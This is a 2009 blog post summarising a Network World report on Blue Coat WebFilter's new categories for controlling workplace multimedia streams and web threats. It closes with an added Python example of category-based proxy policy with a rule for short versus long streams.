(Side note: I love the title of their blog "You had me at EHLO" - as a former postmaster, I can really appreciate it.)
Wednesday, October 21, 2009
Keeping an Eye on Multimedia Application Use
Network World reported this week on Blue Coat's new offerings for monitoring multimedia application use in the workplace.  IT admins have routinely blocked or allowed video traffic based on corporate requirements and policies.  There was a time you could easily claim video traffic from sites like YouTube was recreational in nature and block it.  Lately, though, there's more and more legitimate business content, such as training videos, on YouTube, which makes it harder for IT admins and HR groups to make a blanket policy decision on what's allowed in the workplace.
Blue Coat Systems, in its latest update, is trying to give its customers greater flexibility when it comes to application and bandwidth policies. By upgrading to Blue Coat's newest version of its URL filtering software, called WebFilter, IT managers will have more granular control over Web-based multimedia applications and greater protection against Web-based threats. Ten new categories are now available in WebFilter, including six network usage-related and four security-related categories.
From Network World:
The goal is to give enterprises the tools to see how employees are really using Web-based applications and content, and then apply policies that don’t get in the way of important business activities, says Steve House, Director of Product Marketing at Blue Coat. “We’re getting more granular in our ability to understand Web traffic. More and more traffic is moving to the Web, including business traffic and recreational traffic,” House says. “We have really invested in understanding that and are using that information to make better decisions around how the network is utilized and how secure the environment might really be.”
On the multimedia front, Blue Coat added six new categories to WebFilter: media sharing, art/culture, Internet telephony, network errors, TV/video streams and radio/audio streams. With these new categories, companies can distinguish between the different types of multimedia applications so they don’t adopt inflexible traffic policies that limit productivity.
Another new feature is the ability to differentiate long radio and video streams from short streams that are less than 15 minutes. This lets a business allow shorter audio/video clips during normal business hours but only allow bandwidth consuming TV/video streams after business hours, for instance.
“There’s a very big difference between someone watching a two-minute training video versus someone going to Hulu and watching a TV show or two-hour movie,” House says. “Those things can definitely consume massive amounts of resources and are much more of a productivity drain.”
In addition, Blue Coat WebFilter can now assign URLs to up to four categories. For example, an online news publication could be classified in the news category, while the sports section of that publication could be classified under both the news and sports categories so a company could decide to restrict access to the sports section without blocking access to the entire news site.
On the security front, Blue Coat added four new categories designed to better filter Web-based threats associated with unwanted software, online meetings, translation sites and greeting cards.
“For a long time we’ve had the ability to block malware, but now we separately categorize the sites that are trying to instruct botnet-controlled computers, ones that have been infected,” House says. “If you can look and see [which computers] they’re trying to talk to, you can not only block it but also run a report to see who has been infected and turn that over to the IT group.”
Just a good reminder to keep our proxy software up to date, so we can take advantage of new features to make developing enterprise policy on the proxy easier.
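The two features the article describes, a URL carrying several categories at once and a short-versus-long stream rule, are easy to picture as policy logic. The added example below models them in plain Python; it is not Blue Coat's own policy language or code, the categorization table and business hours are constructed, and only the 15-minute short-stream threshold and the category names come from the article.

```python
"""Multi-category URL policy with a short/long stream rule.

Added example modelled on the features described in the Network World quote;
not Blue Coat's policy language. Categorization table and hours are constructed.
"""
from datetime import time
from typing import Dict, Set, Tuple

# Constructed categorization: a URL prefix may carry up to four categories, so
# the sports section of a news site is "news" as well as "sports".
URL_CATEGORIES: Dict[str, Set[str]] = {
    "news.example.com/": {"news"},
    "news.example.com/sports/": {"news", "sports"},
    "video.example.com/training/": {"tv/video streams"},
    "tv.example.net/": {"tv/video streams"},
    "radio.example.net/": {"radio/audio streams"},
}
STREAM_CATEGORIES = {"tv/video streams", "radio/audio streams"}
SHORT_STREAM_MINUTES = 15                    # article: short streams are under 15 minutes
BUSINESS_HOURS = (time(8, 0), time(18, 0))  # assumption for this example


def categorize(url: str) -> Set[str]:
    """Longest matching prefix wins, so a deeper path refines its parent site."""
    key = url.split("://", 1)[-1]
    best = max((p for p in URL_CATEGORIES if key.startswith(p)), key=len, default=None)
    return set(URL_CATEGORIES[best]) if best else {"uncategorized"}


def in_business_hours(now: time) -> bool:
    start, end = BUSINESS_HOURS
    return start <= now < end


def evaluate(url: str, now: time, blocked: Set[str],
             stream_minutes: int = 0) -> Tuple[str, str]:
    """Deny if any of the URL's categories is blocked; otherwise allow short
    streams at any time and long streams only outside business hours."""
    cats = categorize(url)
    hit = cats & blocked
    if hit:
        return "deny", "blocked category: " + ", ".join(sorted(hit))
    if (cats & STREAM_CATEGORIES and stream_minutes >= SHORT_STREAM_MINUTES
            and in_business_hours(now)):
        return "deny", f"long stream ({stream_minutes} min) during business hours"
    return "allow", "categories: " + ", ".join(sorted(cats))


if __name__ == "__main__":
    print(evaluate("http://news.example.com/sports/scores", time(10), {"sports"}))
    print(evaluate("http://news.example.com/world", time(10), {"sports"}))
    print(evaluate("http://video.example.com/training/intro", time(10), set(), 2))
    print(evaluate("http://tv.example.net/show", time(10), set(), 120))
    print(evaluate("http://tv.example.net/show", time(20), set(), 120))
```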